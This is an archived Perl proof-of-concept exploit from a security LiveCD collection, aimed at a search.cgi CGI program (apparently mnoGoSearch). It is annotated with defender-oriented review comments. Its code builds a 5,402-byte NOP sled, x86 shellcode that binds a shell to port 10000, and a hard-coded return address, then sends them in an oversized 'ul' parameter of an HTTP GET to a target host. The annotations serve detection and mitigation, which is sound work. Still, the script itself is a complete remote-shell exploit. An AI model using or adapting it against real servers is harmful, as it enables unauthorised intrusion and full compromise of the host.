/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / webapp / mngosearch / DSR-mnogo.pl < prev    next >
Text File  |  2005-02-12  |  923b  |  38 lines

  1. # shellcode binds shell to port 10000
     #
     # Archived proof-of-concept for a remote memory-corruption bug in a
     # search.cgi CGI program (presumably mnoGoSearch, going by the banner
     # and archive path -- confirm against the advisory). The script sends a
     # single HTTP GET whose "ul" query parameter is an oversized binary
     # string: NOP padding, machine code, then a hard-coded address repeated.
     #
     # Reading notes for defenders:
     #  * Network indicator: a request for /cgi-bin/search.cgi whose "ul"
     #    value is more than 5,400 bytes long, begins with a long run of
     #    0x90 bytes and contains raw, non-URL-encoded binary data.
     #  * Protocol oddities: HTTP/1.0, bare LF line endings ("\n\n" rather
     #    than CRLF) and no Host header.
     #  * Host indicator: per the header comment, a successful run leaves a
     #    TCP listener on port 10000 attached to a shell started by the CGI
     #    process.
     #  * Mitigation: run a fixed release of the search software (version
     #    not stated on this page), cap request-line/query length at the
     #    front-end web server, filter inbound connections to unexpected
     #    ports, and run CGI programs with the least privilege possible.
     #
     # NOTE(review): there is no "use strict" / "use warnings", and every
     # variable below is a package global.
  2.  
  3. use IO::Socket;
  4.  
     # Requires exactly one positional argument in practice: the target host.
  5. unless (@ARGV > 0) { die "Usage ./DSR-mnogo IP"}
  6.  
  7. $host = shift(@ARGV);
     # Hard-coded 32-bit value appended after the payload. pack("l") emits
     # it in the byte order of the machine running the script.
     # NOTE(review): the 0xbfbf.... range looks like a stack address on the
     # intended target; the platform is not stated on this page.
  8. $ret = pack("l",0xbfbff670);
     # 5402 bytes of 0x90 (x86 NOP) used as padding in front of the payload.
  9. $nop = "\x90"x5402;
  10.  
     # Opaque x86 machine code, left untouched. Two things can be read
     # straight from the bytes: "\x27\x10" is 0x2710 = 10000 in network byte
     # order (matching the header comment), and the pushed constants
     # "\x2f\x2f\x73\x68" / "\x2f\x62\x69\x6e" spell "//sh" and "/bin".
  11. $shellcode = 
  12. "\x31\xc9\xf7\xe1\x51\x41\x51\x41\x51\x51\xb0\x61\xcd\x80\x89\xc3\x52\x66\x68\x27\x10\x66\x51\x89\xe6\xb1\x10\x51\x56\x50\x50\xb0\x68\xcd\x80\x51\x53\x53\xb0\x6a\xcd\x80\x52\x52\x53\x53\xb0\x1e\xcd\x80\xb1\x03\x89\xc3\xb0\x5a\x49\x51\x53\x53\xcd\x80\x41\xe2\xf5\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x54\x53\x53\xb0\x3b\xcd\x80";
  13.  
  14.  
     # Final parameter value: padding, then the machine code, then the
     # packed address twice.
  15. $exploit_string = $nop.$shellcode.$ret.$ret;
  16.  
  17.  
  18. print "\nRemote Mnogo Exploit \n";
  19. print "Code by inv \n\n";
  20. print "Host: $host\n";
  21.  
     # "http(80)" is the IO::Socket::INET service-name form with a numeric
     # fallback port. NOTE(review): the constructor result is never checked,
     # so a failed connection leaves $remote undefined.
  22. $remote = IO::Socket::INET->new(
  23.  
  24.     Proto         =>    "tcp",
  25.     PeerAddr    =>    $host,
  26.     PeerPort    =>    "http(80)",
  27.     );
  28.  
  29. $remote->autoflush(1);
  30.  
     # The binary string is interpolated into the request line as-is, with
     # no URL-encoding, so the request line carries raw high-bit bytes. The
     # request ends with bare LFs and has no headers.
  31. print $remote "GET /cgi-bin/search.cgi?ul=$exploit_string HTTP/1.0\n\n";
  32.  
     # Echo whatever the server sends back to STDOUT until it closes.
  33. while ( <$remote> ) { print }
  34.  
  35. close $remote;
  36.  
  37.  
  38.